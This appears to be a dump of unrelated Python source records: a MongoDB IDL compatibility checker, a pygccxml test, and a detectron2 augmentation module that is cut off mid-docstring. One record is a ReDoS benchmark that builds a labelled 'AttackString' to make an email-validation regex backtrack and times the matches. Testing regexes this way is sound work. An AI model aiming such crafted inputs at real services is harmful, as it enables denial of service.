ctxt.add_missing_error_reply_struct_error(new_basic_types_path)\n else:\n check_reply_fields(ctxt, old_error_reply_struct, new_error_reply_struct, \"n/a\",\n old_idl_file, new_idl_file, old_basic_types_path,\n new_basic_types_path)\n\n ctxt.errors.dump_errors()\n return ctxt.errors\n\n\ndef split_complex_checks(\n complex_checks: List[syntax.AccessCheck]) -> Tuple[List[str], List[syntax.Privilege]]:\n \"\"\"Split a list of AccessCheck into checks and privileges.\"\"\"\n checks = [x.check for x in complex_checks if x.check is not None]\n privileges = [x.privilege for x in complex_checks if x.privilege is not None]\n # Sort the list of privileges by the length of the action_type list, in decreasing order\n # so that two lists of privileges can be compared later.\n return checks, sorted(privileges, key=lambda x: len(x.action_type), reverse=True)\n\n\ndef check_complex_checks(ctxt: IDLCompatibilityContext,\n old_complex_checks: List[syntax.AccessCheck],\n new_complex_checks: List[syntax.AccessCheck], cmd: syntax.Command,\n new_idl_file_path: str) -> None:\n \"\"\"Check the compatibility between complex access checks of the old and new command.\"\"\"\n cmd_name = cmd.command_name\n if len(new_complex_checks) > len(old_complex_checks):\n ctxt.add_new_additional_complex_access_check_error(cmd_name, new_idl_file_path)\n else:\n old_checks, old_privileges = split_complex_checks(old_complex_checks)\n new_checks, new_privileges = split_complex_checks(new_complex_checks)\n if not set(new_checks).issubset(old_checks):\n ctxt.add_new_complex_checks_not_subset_error(cmd_name, new_idl_file_path)\n\n if len(new_privileges) > len(old_privileges):\n ctxt.add_new_complex_privileges_not_subset_error(cmd_name, new_idl_file_path)\n else:\n # Check that each new_privilege matches an old_privilege (the resource_pattern is\n # equal and the action_types are a subset of the old action_types).\n for new_privilege in new_privileges:\n for old_privilege in old_privileges:\n if (new_privilege.resource_pattern == old_privilege.resource_pattern\n and set(new_privilege.action_type).issubset(old_privilege.action_type)):\n old_privileges.remove(old_privilege)\n break\n else:\n ctxt.add_new_complex_privileges_not_subset_error(cmd_name, new_idl_file_path)\n\n\ndef split_complex_checks_agg_stages(\n complex_checks: List[syntax.AccessCheck]) -> Dict[str, List[syntax.AccessCheck]]:\n \"\"\"Split a list of AccessChecks into a map keyed by aggregation stage (defaults to None).\"\"\"\n complex_checks_agg_stages: Dict[str, List[syntax.AccessCheck]] = dict()\n for access_check in complex_checks:\n agg_stage = None\n if access_check.privilege is not None:\n # x.privilege.agg_stage can still be None.\n agg_stage = access_check.privilege.agg_stage\n if agg_stage not in complex_checks_agg_stages:\n complex_checks_agg_stages[agg_stage] = []\n complex_checks_agg_stages[agg_stage].append(access_check)\n return complex_checks_agg_stages\n\n\ndef check_complex_checks_agg_stages(ctxt: IDLCompatibilityContext,\n old_complex_checks: List[syntax.AccessCheck],\n new_complex_checks: List[syntax.AccessCheck],\n cmd: syntax.Command, new_idl_file_path: str) -> None:\n \"\"\"Check the compatibility between complex access checks of the old and new agggreation stages.\"\"\"\n new_complex_checks_agg_stages = split_complex_checks_agg_stages(new_complex_checks)\n old_complex_checks_agg_stages = split_complex_checks_agg_stages(old_complex_checks)\n for agg_stage in new_complex_checks_agg_stages:\n # Aggregation stages are considered separate commands in the context of validating the\n # Stable API. Therefore, it is okay to skip recently added aggregation stages that are\n # are not present in the previous release.\n if agg_stage not in old_complex_checks_agg_stages:\n continue\n check_complex_checks(ctxt, old_complex_checks_agg_stages[agg_stage],\n new_complex_checks_agg_stages[agg_stage], cmd, new_idl_file_path)\n\n\ndef check_security_access_checks(ctxt: IDLCompatibilityContext,\n old_access_checks: syntax.AccessChecks,\n new_access_checks: syntax.AccessChecks, cmd: syntax.Command,\n new_idl_file_path: str) -> None:\n \"\"\"Check the compatibility between security access checks of the old and new command.\"\"\"\n # pylint:disable=too-many-locals,too-many-branches,too-many-nested-blocks\n cmd_name = cmd.command_name\n if old_access_checks is not None and new_access_checks is not None:\n old_access_check_type = old_access_checks.get_access_check_type()\n new_access_check_type = new_access_checks.get_access_check_type()\n if old_access_check_type != new_access_check_type:\n ctxt.add_access_check_type_not_equal_error(cmd_name, old_access_check_type,\n new_access_check_type, new_idl_file_path)\n else:\n old_simple_check = old_access_checks.simple\n new_simple_check = new_access_checks.simple\n if old_simple_check is not None and new_simple_check is not None:\n if old_simple_check.check != new_simple_check.check:\n ctxt.add_check_not_equal_error(cmd_name, old_simple_check.check,\n new_simple_check.check, new_idl_file_path)\n else:\n old_privilege = old_simple_check.privilege\n new_privilege = new_simple_check.privilege\n if old_privilege is not None and new_privilege is not None:\n if old_privilege.resource_pattern != new_privilege.resource_pattern:\n ctxt.add_resource_pattern_not_equal_error(\n cmd_name, old_privilege.resource_pattern,\n new_privilege.resource_pattern, new_idl_file_path)\n if not set(new_privilege.action_type).issubset(old_privilege.action_type):\n ctxt.add_new_action_types_not_subset_error(cmd_name, new_idl_file_path)\n\n old_complex_checks = old_access_checks.complex\n new_complex_checks = new_access_checks.complex\n if old_complex_checks is not None and new_complex_checks is not None:\n check_complex_checks_agg_stages(ctxt, old_complex_checks, new_complex_checks, cmd,\n new_idl_file_path)\n\n elif new_access_checks is None and old_access_checks is not None:\n ctxt.add_removed_access_check_field_error(cmd_name, new_idl_file_path)\n elif old_access_checks is None and new_access_checks is not None and cmd.api_version == '1':\n ctxt.add_added_access_check_field_error(cmd_name, new_idl_file_path)\n\n\ndef check_compatibility(old_idl_dir: str, new_idl_dir: str, old_import_directories: List[str],\n new_import_directories: List[str]) -> IDLCompatibilityErrorCollection:\n \"\"\"Check IDL compatibility between old and new IDL commands.\"\"\"\n # pylint: disable=too-many-locals\n ctxt = IDLCompatibilityContext(old_idl_dir, new_idl_dir, IDLCompatibilityErrorCollection())\n\n new_commands, new_command_file, new_command_file_path = get_new_commands(\n ctxt, new_idl_dir, new_import_directories)\n\n # Check new commands' compatibility with old ones.\n # Note, a command can be added to V1 at any time, it's ok if a\n # new command has no corresponding old command.\n old_commands: Dict[str, syntax.Command] = dict()\n for dirpath, _, filenames in os.walk(old_idl_dir):\n for old_filename in filenames:\n if not old_filename.endswith('.idl') or old_filename in SKIPPED_FILES:\n continue\n\n old_idl_file_path = os.path.join(dirpath, old_filename)\n with open(old_idl_file_path) as old_file:\n old_idl_file = parser.parse(\n old_file, old_idl_file_path,\n CompilerImportResolver(old_import_directories + [old_idl_dir]))\n if old_idl_file.errors:\n old_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {old_idl_file_path}\")\n\n for old_cmd in old_idl_file.spec.symbols.commands:\n # Ignore imported commands as they will be processed in their own file.\n if old_cmd.api_version == \"\" or old_cmd.imported:\n continue\n\n # Ignore select commands that were removed after being added to the strict API.\n # Only commands that were never visible to the end-user in previous releases\n # (i.e., hidden behind a feature flag) should be allowed here.\n if old_cmd.command_name in IGNORE_COMMANDS_LIST:\n continue\n\n if old_cmd.api_version != \"1\":\n # We're not ready to handle future API versions yet.\n ctxt.add_command_invalid_api_version_error(\n old_cmd.command_name, old_cmd.api_version, old_idl_file_path)\n continue\n\n if old_cmd.command_name in old_commands:\n ctxt.add_duplicate_command_name_error(old_cmd.command_name, old_idl_dir,\n old_idl_file_path)\n continue\n\n old_commands[old_cmd.command_name] = old_cmd\n\n if old_cmd.command_name not in new_commands:\n # Can't remove a command from V1\n ctxt.add_command_removed_error(old_cmd.command_name, old_idl_file_path)\n continue\n\n new_cmd = new_commands[old_cmd.command_name]\n new_idl_file = new_command_file[old_cmd.command_name]\n new_idl_file_path = new_command_file_path[old_cmd.command_name]\n\n if not old_cmd.strict and new_cmd.strict:\n ctxt.add_command_strict_true_error(new_cmd.command_name, new_idl_file_path)\n\n # Check compatibility of command's parameters.\n check_command_params_or_type_struct_fields(\n ctxt, old_cmd, new_cmd, old_cmd.command_name, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path, is_command_parameter=True)\n\n check_namespace(ctxt, old_cmd, new_cmd, old_idl_file, new_idl_file,\n old_idl_file_path, new_idl_file_path)\n\n old_reply = old_idl_file.spec.symbols.get_struct(old_cmd.reply_type)\n new_reply = new_idl_file.spec.symbols.get_struct(new_cmd.reply_type)\n check_reply_fields(ctxt, old_reply, new_reply, old_cmd.command_name,\n old_idl_file, new_idl_file, old_idl_file_path,\n new_idl_file_path)\n\n check_security_access_checks(ctxt, old_cmd.access_check, new_cmd.access_check,\n old_cmd, new_idl_file_path)\n\n ctxt.errors.dump_errors()\n return ctxt.errors\n\n\ndef get_generic_arguments(gen_args_file_path: str) -> Tuple[Set[str], Set[str]]:\n \"\"\"Get arguments and reply fields from generic_argument.idl and check validity.\"\"\"\n arguments: Set[str] = set()\n reply_fields: Set[str] = set()\n\n with open(gen_args_file_path) as gen_args_file:\n parsed_idl_file = parser.parse(gen_args_file, gen_args_file_path,\n CompilerImportResolver([]))\n if parsed_idl_file.errors:\n parsed_idl_file.errors.dump_errors()\n raise ValueError(f\"Cannot parse {gen_args_file_path}\")\n for argument in parsed_idl_file.spec.symbols.get_generic_argument_list(\n \"generic_args_api_v1\").fields:\n arguments.add(argument.name)\n\n for reply_field in parsed_idl_file.spec.symbols.get_generic_reply_field_list(\n \"generic_reply_fields_api_v1\").fields:\n reply_fields.add(reply_field.name)\n\n return arguments, reply_fields\n\n\ndef check_generic_arguments_compatibility(old_gen_args_file_path: str, new_gen_args_file_path: str\n ) -> IDLCompatibilityErrorCollection:\n \"\"\"Check IDL compatibility between old and new generic_argument.idl files.\"\"\"\n # IDLCompatibilityContext takes in both 'old_idl_dir' and 'new_idl_dir',\n # but for generic_argument.idl, the parent directories aren't helpful for logging purposes.\n # Instead, we pass in \"old generic_argument.idl\" and \"new generic_argument.idl\"\n # to make error messages clearer.\n ctxt = IDLCompatibilityContext(\"old generic_argument.idl\", \"new generic_argument.idl\",\n IDLCompatibilityErrorCollection())\n\n old_arguments, old_reply_fields = get_generic_arguments(old_gen_args_file_path)\n new_arguments, new_reply_fields = get_generic_arguments(new_gen_args_file_path)\n\n for old_argument in old_arguments:\n if old_argument not in new_arguments:\n ctxt.add_generic_argument_removed(old_argument, new_gen_args_file_path)\n\n for old_reply_field in old_reply_fields:\n if old_reply_field not in new_reply_fields:\n ctxt.add_generic_argument_removed_reply_field(old_reply_field, new_gen_args_file_path)\n\n return ctxt.errors\n\n\ndef main():\n \"\"\"Run the script.\"\"\"\n arg_parser = argparse.ArgumentParser(description=__doc__)\n arg_parser.add_argument(\"-v\", \"--verbose\", action=\"count\", help=\"Enable verbose logging\")\n arg_parser.add_argument(\"--old-include\", dest=\"old_include\", type=str, action=\"append\",\n default=[], help=\"Directory to search for old IDL import files\")\n arg_parser.add_argument(\"--new-include\", dest=\"new_include\", type=str, action=\"append\",\n default=[], help=\"Directory to search for new IDL import files\")\n arg_parser.add_argument(\"old_idl_dir\", metavar=\"OLD_IDL_DIR\",\n help=\"Directory where old IDL files are located\")\n arg_parser.add_argument(\"new_idl_dir\", metavar=\"NEW_IDL_DIR\",\n help=\"Directory where new IDL files are located\")\n args = arg_parser.parse_args()\n\n error_coll = check_compatibility(args.old_idl_dir, args.new_idl_dir, args.old_include,\n args.new_include)\n if error_coll.has_errors():\n sys.exit(1)\n\n old_basic_types_path = os.path.join(args.old_idl_dir, \"mongo/idl/basic_types.idl\")\n new_basic_types_path = os.path.join(args.new_idl_dir, \"mongo/idl/basic_types.idl\")\n error_reply_coll = check_error_reply(old_basic_types_path, new_basic_types_path,\n args.old_include, args.new_include)\n if error_reply_coll.has_errors():\n sys.exit(1)\n\n old_generic_args_path = os.path.join(args.old_idl_dir, \"mongo/idl/generic_argument.idl\")\n new_generic_args_path = os.path.join(args.new_idl_dir, \"mongo/idl/generic_argument.idl\")\n error_gen_args_coll = check_generic_arguments_compatibility(old_generic_args_path,\n new_generic_args_path)\n if error_gen_args_coll.has_errors():\n sys.exit(1)\n\n\nif __name__ == \"__main__\":\n main()\n"} {"ext": "py", "sha": "1a30f45ca26af266dfc1cf05df3ed7b0940f5bc4", "content": "# 7094\n# ^([a-zA-Z0-9]+[._-])*[a-zA-Z0-9]+@(([a-zA-Z0-9]+|([a-zA-Z0-9]+[.-])+)[a-zA-Z0-9]+\\.[a-zA-Z]{2,4}|([a-zA-Z]\\.com))$\n# POLYNOMIAL\n# nums:5\n# POLYNOMIAL AttackString:\"a@\"+\"a\"*10000+\"!1 _SLQ_2\"\n\nimport re2 as re\nfrom time import perf_counter\n\nregex = \"\"\"^([a-zA-Z0-9]+[._-])*[a-zA-Z0-9]+@(([a-zA-Z0-9]+|([a-zA-Z0-9]+[.-])+)[a-zA-Z0-9]+\\.[a-zA-Z]{2,4}|([a-zA-Z]\\.com))$\"\"\"\nREGEX = re.compile(regex)\nfor i in range(0, 150000):\n ATTACK = \"a@\" + \"a\" * i * 10000 + \"!1 _SLQ_2\"\n LEN = len(ATTACK)\n BEGIN = perf_counter()\n m = REGEX.search(ATTACK)\n # m = REGEX.match(ATTACK)\n DURATION = perf_counter() - BEGIN\n print(f\"{i *10000}: took {DURATION} seconds!\")"} {"ext": "py", "sha": "1a30f4879cacb25046c87c21c2b57560b724e379", "content": "# Copyright 2014-2017 Insight Software Consortium.\n# Copyright 2004-2009 Roman Yakovenko.\n# Distributed under the Boost Software License, Version 1.0.\n# See http://www.boost.org/LICENSE_1_0.txt\n\nimport unittest\nimport logging\n\nfrom . import parser_test_case\n\nfrom pygccxml import utils\n\n\nclass Test(parser_test_case.parser_test_case_t):\n mock_logger = logging.getLogger(\"Test\")\n\n def test_old_xml_generators(self):\n \"\"\"\n Tests for the xml_generators class.\n\n This is for gccxml and for castxml using the gccxml xml file format\n \"\"\"\n self._test_impl(\"0.6\", False, \"is_gccxml_06\")\n self._test_impl(\"1.114\", False, \"is_gccxml_07\")\n self._test_impl(\"1.115\", False, \"is_gccxml_09_buggy\")\n self._test_impl(\"1.126\", False, \"is_gccxml_09_buggy\")\n self._test_impl(\"1.127\", False, \"is_gccxml_09\")\n self._test_impl(\"1.136\", True, \"is_castxml\")\n\n def test_casxtml_epic_version_1(self):\n \"\"\"\n Test with the castxml epic version set to 1\n \"\"\"\n gen = utils.xml_generators(\n self.mock_logger, castxml_format=\"1.1.0\")\n self.assertFalse(gen.is_gccxml)\n self.assertTrue(gen.is_castxml)\n self.assertTrue(gen.is_castxml1)\n self.assertEqual(gen.xml_output_version, \"1.1.0\")\n\n self.assertRaises(RuntimeError, lambda: utils.xml_generators(\n self.mock_logger, \"1.136\", \"1.1.0\"))\n\n self.assertRaises(RuntimeError, lambda: utils.xml_generators(\n self.mock_logger, None, None))\n\n def _test_impl(\n self, gccxml_cvs_revision, is_castxml,\n expected_gccxml_cvs_revision):\n \"\"\"\n Implementation detail for the test\n\n Args:\n gccxml_cvs_revision (str|None) : a known cvs revision\n is_castxml (bool): check for castxml\n expected_gccxml_cvs_revision (str): will be used to check if the\n attribute is set to True.\n \"\"\"\n gen = utils.xml_generators(\n self.mock_logger, gccxml_cvs_revision)\n if is_castxml:\n self.assertFalse(gen.is_gccxml)\n self.assertTrue(gen.is_castxml)\n else:\n self.assertTrue(gen.is_gccxml)\n self.assertFalse(gen.is_castxml)\n self.assertTrue(getattr(gen, expected_gccxml_cvs_revision))\n self.assertEqual(gen.xml_output_version, gccxml_cvs_revision)\n\n\ndef create_suite():\n suite = unittest.TestSuite()\n suite.addTest(unittest.makeSuite(Test))\n return suite\n\n\ndef run_suite():\n unittest.TextTestRunner(verbosity=2).run(create_suite())\n\n\nif __name__ == \"__main__\":\n run_suite()\n"} {"ext": "py", "sha": "1a30f4a6d80dec42a68c7b27633063e1e23f7f05", "content": "# -*- coding: utf-8 -*-\n# Copyright (c) Facebook, Inc. and its affiliates. All Rights Reserved\n# File: transformer.py\n\nimport inspect\nimport numpy as np\nimport pprint\nimport sys\nfrom abc import ABCMeta, abstractmethod\nfrom fvcore.transforms.transform import (\n BlendTransform,\n CropTransform,\n HFlipTransform,\n NoOpTransform,\n Transform,\n TransformList,\n VFlipTransform,\n)\nfrom PIL import Image\n\nfrom .transform import ExtentTransform, ResizeTransform, RotationTransform\n\n__all__ = [\n \"RandomApply\",\n \"RandomBrightness\",\n \"RandomContrast\",\n \"RandomCrop\",\n \"RandomExtent\",\n \"RandomFlip\",\n \"RandomSaturation\",\n \"RandomLighting\",\n \"RandomRotation\",\n \"Resize\",\n \"ResizeShortestEdge\",\n \"TransformGen\",\n \"apply_transform_gens\",\n]\n\n\ndef check_dtype(img):\n assert isinstance(img, np.ndarray), \"[TransformGen] Needs an numpy array, but got a {}!\".format(\n type(img)\n )\n assert not isinstance(img.dtype, np.integer) or (\n img.dtype == np.uint8\n ), \"[TransformGen] Got image of type {}, use uint8 or floating points instead!\".format(\n img.dtype\n )\n assert img.ndim in [2, 3], img.ndim\n\n\nclass TransformGen(metaclass=ABCMeta):\n \"\"\"\n TransformGen takes an image of type uint8 in range [0, 255], or\n floating point in range [0, 1] or [0, 255] as input.\n\n It creates a :class:`Transform` based on the given image, sometimes with randomness.\n The transform can then be used to transform images\n or other data (boxes, points, annotations, etc.) associated with it.\n\n The assumption made in this class\n is that the image itself is sufficient to instantiate a transform.\n When this assumption is not true, you need to create the transforms by your own.\n\n A list of `TransformGen` can be applied with :func:`apply_transform_gens`.\n \"\"\"\n\n def _init(self, params=None):\n if params:\n for k, v in params.items():\n if k != \"self\" and not k.startswith(\"_\"):\n setattr(self, k, v)\n\n @abstractmethod\n def get_transform(self, img):\n pass\n\n def _rand_range(self, low=1.0, high=None, size=None):\n \"\"\"\n Uniform float random number between low and high.\n \"\"\"\n if high is None:\n low, high = 0, low\n if size is None:\n size = []\n return np.random.uniform(low, high, size)\n\n def __repr__(self):\n \"\"\"\n Produce something like:\n \"MyTransformGen(field1={self.field1}, field2={self.field2})\"\n \"\"\"\n try:\n sig = inspect.signature(self.__init__)\n classname = type(self).__name__\n argstr = []\n for name, param in sig.parameters.items():\n assert (\n param.kind != param.VAR_POSITIONAL and param.kind != param.VAR_KEYWORD\n ), \"The default __repr__ doesn't support *args or **kwargs\"\n assert hasattr(self, name), (\n \"Attribute {} not found! \"\n \"Default __repr__ only works if attributes match the constructor.\".format(name)\n )\n attr = getattr(self, name)\n default = param.default\n if default is attr:\n continue\n argstr.append(\"{}={}\".format(name, pprint.pformat(attr)))\n return \"{}({})\".format(classname, \", \".join(argstr))\n except AssertionError:\n return super().__repr__()\n\n __str__ = __repr__\n\n\nclass RandomApply(TransformGen):\n \"\"\"\n Randomly apply the wrapper transformation with a given probability.\n \"\"\"\n\n def __init__(self, transform, prob=0.5):\n \"\"\"\n Args:\n transform (Transform, TransformGen): the transform to be wrapped\n by the `RandomApply`. The `transform` can either be a\n `Transform` or `TransformGen` instance.\n prob (float): probability between 0.0 and 1.0 that\n the wrapper transformation is applied\n \"\"\"\n super().__init__()\n assert isinstance(transform, (Transform, TransformGen)), (\n f\"The given transform must either be a Transform or TransformGen instance. \"\n f\"Not {type(transform)}\"\n )\n assert 0.0 <= prob <= 1.0, f\"Probablity must be between 0.0 and 1.0 (given: {prob})\"\n self.prob = prob\n self.transform = transform\n\n def get_transform(self, img):\n do = self._rand_range() < self.prob\n if do:\n if isinstance(self.transform, TransformGen):\n return self.transform.get_transform(img)\n else:\n return self.transform\n else:\n return NoOpTransform()\n\n\nclass RandomFlip(TransformGen):\n \"\"\"\n Flip the image horizontally or vertically with the given probability.\n \"\"\"\n\n def __init__(self, prob=0.5, *, horizontal=True, vertical=False):\n \"\"\"\n Args:\n prob (float): probability of flip.\n horizontal (boolean): whether to apply horizontal flipping\n vertical (boolean): whether to apply vertical flipping\n \"\"\"\n super().__init__()\n\n if horizontal and vertical:\n raise ValueError(\"Cannot do both horiz and vert. Please use two Flip instead.\")\n if not horizontal and not vertical:\n raise ValueError(\"At least one of horiz or vert has to be True!\")\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n do = self._rand_range() < self.prob\n if do:\n if self.horizontal:\n return HFlipTransform(w)\n elif self.vertical:\n return VFlipTransform(h)\n else:\n return NoOpTransform()\n\n\nclass Resize(TransformGen):\n \"\"\" Resize image to a target size\"\"\"\n\n def __init__(self, shape, interp=Image.BILINEAR):\n \"\"\"\n Args:\n shape: (h, w) tuple or a int\n interp: PIL interpolation method\n \"\"\"\n if isinstance(shape, int):\n shape = (shape, shape)\n shape = tuple(shape)\n self._init(locals())\n\n def get_transform(self, img):\n return ResizeTransform(\n img.shape[0], img.shape[1], self.shape[0], self.shape[1], self.interp\n )\n\n\nclass ResizeShortestEdge(TransformGen):\n \"\"\"\n Scale the shorter edge to the given size, with a limit of `max_size` on the longer edge.\n If `max_size` is reached, then downscale so that the longer edge does not exceed max_size.\n \"\"\"\n\n def __init__(\n self, short_edge_length, max_size=sys.maxsize, sample_style=\"range\", interp=Image.BILINEAR\n ):\n \"\"\"\n Args:\n short_edge_length (list[int]): If ``sample_style==\"range\"``,\n a [min, max] interval from which to sample the shortest edge length.\n If ``sample_style==\"choice\"``, a list of shortest edge lengths to sample from.\n max_size (int): maximum allowed longest edge length.\n sample_style (str): either \"range\" or \"choice\".\n \"\"\"\n super().__init__()\n assert sample_style in [\"range\", \"choice\"], sample_style\n\n self.is_range = sample_style == \"range\"\n if isinstance(short_edge_length, int):\n short_edge_length = (short_edge_length, short_edge_length)\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n\n if self.is_range:\n size = np.random.randint(self.short_edge_length[0], self.short_edge_length[1] + 1)\n else:\n size = np.random.choice(self.short_edge_length)\n if size == 0:\n return NoOpTransform()\n\n scale = size * 1.0 / min(h, w)\n if h < w:\n newh, neww = size, scale * w\n else:\n newh, neww = scale * h, size\n if max(newh, neww) > self.max_size:\n scale = self.max_size * 1.0 / max(newh, neww)\n newh = newh * scale\n neww = neww * scale\n neww = int(neww + 0.5)\n newh = int(newh + 0.5)\n return ResizeTransform(h, w, newh, neww, self.interp)\n\n\nclass RandomRotation(TransformGen):\n \"\"\"\n This method returns a copy of this image, rotated the given\n number of degrees counter clockwise around the given center.\n \"\"\"\n\n def __init__(self, angle, expand=True, center=None, sample_style=\"range\", interp=None):\n \"\"\"\n Args:\n angle (list[float]): If ``sample_style==\"range\"``,\n a [min, max] interval from which to sample the angle (in degrees).\n If ``sample_style==\"choice\"``, a list of angles to sample from\n expand (bool): choose if the image should be resized to fit the whole\n rotated image (default), or simply cropped\n center (list[[float, float]]): If ``sample_style==\"range\"``,\n a [[minx, miny], [maxx, maxy]] relative interval from which to sample the center,\n [0, 0] being the top left of the image and [1, 1] the bottom right.\n If ``sample_style==\"choice\"``, a list of centers to sample from\n Default: None, which means that the center of rotation is the center of the image\n center has no effect if expand=True because it only affects shifting\n \"\"\"\n super().__init__()\n assert sample_style in [\"range\", \"choice\"], sample_style\n self.is_range = sample_style == \"range\"\n if isinstance(angle, (float, int)):\n angle = (angle, angle)\n if center is not None and isinstance(center[0], (float, int)):\n center = (center, center)\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n center = None\n if self.is_range:\n angle = np.random.uniform(self.angle[0], self.angle[1])\n if self.center is not None:\n center = (\n np.random.uniform(self.center[0][0], self.center[1][0]),\n np.random.uniform(self.center[0][1], self.center[1][1]),\n )\n else:\n angle = np.random.choice(self.angle)\n if self.center is not None:\n center = np.random.choice(self.center)\n\n if center is not None:\n center = (w * center[0], h * center[1]) # Convert to absolute coordinates\n\n return RotationTransform(h, w, angle, expand=self.expand, center=center, interp=self.interp)\n\n\nclass RandomCrop(TransformGen):\n \"\"\"\n Randomly crop a subimage out of an image.\n \"\"\"\n\n def __init__(self, crop_type: str, crop_size):\n \"\"\"\n Args:\n crop_type (str): one of \"relative_range\", \"relative\", \"absolute\".\n See `config/defaults.py` for explanation.\n crop_size (tuple[float]): the relative ratio or absolute pixels of\n height and width\n \"\"\"\n super().__init__()\n assert crop_type in [\"relative_range\", \"relative\", \"absolute\"]\n self._init(locals())\n\n def get_transform(self, img):\n h, w = img.shape[:2]\n croph, cropw = self.get_crop_size((h, w))\n assert h >= croph and w >= cropw, \"Shape computation in {} has bugs.\".format(self)\n h0 = np.random.randint(h - croph + 1)\n w0 = np.random.randint(w - cropw + 1)\n return CropTransform(w0, h0, cropw, croph)\n\n def get_crop_size(self, image_size):\n \"\"\"\n Args:\n image_size (tuple): height, width\n\n Returns:\n crop_size (tuple): height, width in absolute pixels\n \"\"\"\n h, w = image_size\n if self.crop_type == \"relative\":\n ch, cw = self.crop_size\n return int(h * ch + 0.5), int(w * cw + 0.5)\n elif self.crop_type == \"relative_range\":\n crop_size = np.asarray(self.crop_size, dtype=np.float32)\n ch, cw = crop_size + np.random.rand(2) * (1 - crop_size)\n return int(h * ch + 0.5), int(w * cw + 0.5)\n elif self.crop_type == \"absolute\":\n return (min(self.crop_size[0], h), min(self.crop_size[1], w))\n else:\n NotImplementedError(\"Unknown crop type {}\".format(self.crop_type))\n\n\nclass RandomExtent(TransformGen):\n \"\"\"\n Outputs an image by cropping a random \"subrect\" of the source image.\n\n The subrect can be parameterized to include pixels outside the source image,\n in which case they will be set to zeros (i.e. black). The size of the output\n image will vary with the size of the random subrect.\n \"\"\"\n\n def __init__(self, scale_range, shift_range):\n \"\"\"\n Args:\n output_size (h, w): Dimensions of output image\n scale_range (l, h): Range of input-to-output size scaling factor\n shift_range (x, y): Range of shifts of the cropped subrect. The rect\n is shifted by [w / 2 * Uniform(-x, x), h / 2 * Uniform(-y, y)],\n where (w, h) is the (width, height) of the input image. Set each\n component to zero to crop at the image's center.\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n img_h, img_w = img.shape[:2]\n\n # Initialize src_rect to fit the input image.\n src_rect = np.array([-0.5 * img_w, -0.5 * img_h, 0.5 * img_w, 0.5 * img_h])\n\n # Apply a random scaling to the src_rect.\n src_rect *= np.random.uniform(self.scale_range[0], self.scale_range[1])\n\n # Apply a random shift to the coordinates origin.\n src_rect[0::2] += self.shift_range[0] * img_w * (np.random.rand() - 0.5)\n src_rect[1::2] += self.shift_range[1] * img_h * (np.random.rand() - 0.5)\n\n # Map src_rect coordinates into image coordinates (center at corner).\n src_rect[0::2] += 0.5 * img_w\n src_rect[1::2] += 0.5 * img_h\n\n return ExtentTransform(\n src_rect=(src_rect[0], src_rect[1], src_rect[2], src_rect[3]),\n output_size=(int(src_rect[3] - src_rect[1]), int(src_rect[2] - src_rect[0])),\n )\n\n\nclass RandomContrast(TransformGen):\n \"\"\"\n Randomly transforms image contrast.\n\n Contrast intensity is uniformly sampled in (intensity_min, intensity_max).\n - intensity < 1 will reduce contrast\n - intensity = 1 will preserve the input image\n - intensity > 1 will increase contrast\n\n See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html\n \"\"\"\n\n def __init__(self, intensity_min, intensity_max):\n \"\"\"\n Args:\n intensity_min (float): Minimum augmentation\n intensity_max (float): Maximum augmentation\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n w = np.random.uniform(self.intensity_min, self.intensity_max)\n return BlendTransform(src_image=img.mean(), src_weight=1 - w, dst_weight=w)\n\n\nclass RandomBrightness(TransformGen):\n \"\"\"\n Randomly transforms image brightness.\n\n Brightness intensity is uniformly sampled in (intensity_min, intensity_max).\n - intensity < 1 will reduce brightness\n - intensity = 1 will preserve the input image\n - intensity > 1 will increase brightness\n\n See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html\n \"\"\"\n\n def __init__(self, intensity_min, intensity_max):\n \"\"\"\n Args:\n intensity_min (float): Minimum augmentation\n intensity_max (float): Maximum augmentation\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n w = np.random.uniform(self.intensity_min, self.intensity_max)\n return BlendTransform(src_image=0, src_weight=1 - w, dst_weight=w)\n\n\nclass RandomSaturation(TransformGen):\n \"\"\"\n Randomly transforms image saturation.\n\n Saturation intensity is uniformly sampled in (intensity_min, intensity_max).\n - intensity < 1 will reduce saturation (make the image more grayscale)\n - intensity = 1 will preserve the input image\n - intensity > 1 will increase saturation\n\n See: https://pillow.readthedocs.io/en/3.0.x/reference/ImageEnhance.html\n \"\"\"\n\n def __init__(self, intensity_min, intensity_max):\n \"\"\"\n Args:\n intensity_min (float): Minimum augmentation (1 preserves input).\n intensity_max (float): Maximum augmentation (1 preserves input).\n \"\"\"\n super().__init__()\n self._init(locals())\n\n def get_transform(self, img):\n assert img.shape[-1] == 3, \"Saturation only works on RGB images\"\n w = np.random.uniform(self.intensity_min, self.intensity_max)\n grayscale = img.dot([0.299, 0.587, 0.114])[:, :, np.newaxis]\n return BlendTransform(src_image=grayscale, src_weight=1 - w, dst_weight=w)\n\n\nclass RandomLighting(TransformGen):\n \"\"\"\n Randomly transforms image color using fixed PCA over ImageNet.\n\n The degree of color jittering is randomly sampled via a normal distribution,\n with standard deviation given by the scale parameter.\n \"\"\"\n\n def __init__(self, scale):\n \"\"\"\n Args:\n scale (float): Standard deviation of principal component weighting.\n \"\"\"\n super().__init__()\n self._init(locals())\n self.eigen_vecs = np.array(\n [[-0.5675, 0.7192, 0.4009], [-0.5808, -0.0045, -0.8140], [-0.5836, -0.6948, 0.4203]]\n )\n self.eigen_vals = np.array([0.2175, 0.0188, 0.0045])\n\n def get_transform(self, img):\n assert img.shape[-1] == 3, \"Saturation only works on RGB images\"\n weights = np.random.normal(scale=self.scale, size=3)\n return BlendTransform(\n src_image=self.eigen_vecs.dot(weights * self.eigen_vals), src_weight=1.0, dst_weight=1.0\n )\n\n\ndef apply_transform_gens(transform_gens, img):\n \"\"\"\n Apply a list of :class:`TransformGen` on the input image, and\n returns the transformed image and a list of transforms.\n\n We cannot simply create and return all transforms without\n applying it to the image, because a subsequent transform may\n need the output of the previous one.\n\n Args:\n transform_gens (list): list of :class:`TransformGen` instance to\n be applied.\n img (ndarray): uint8 or floating point images with 1 or 3 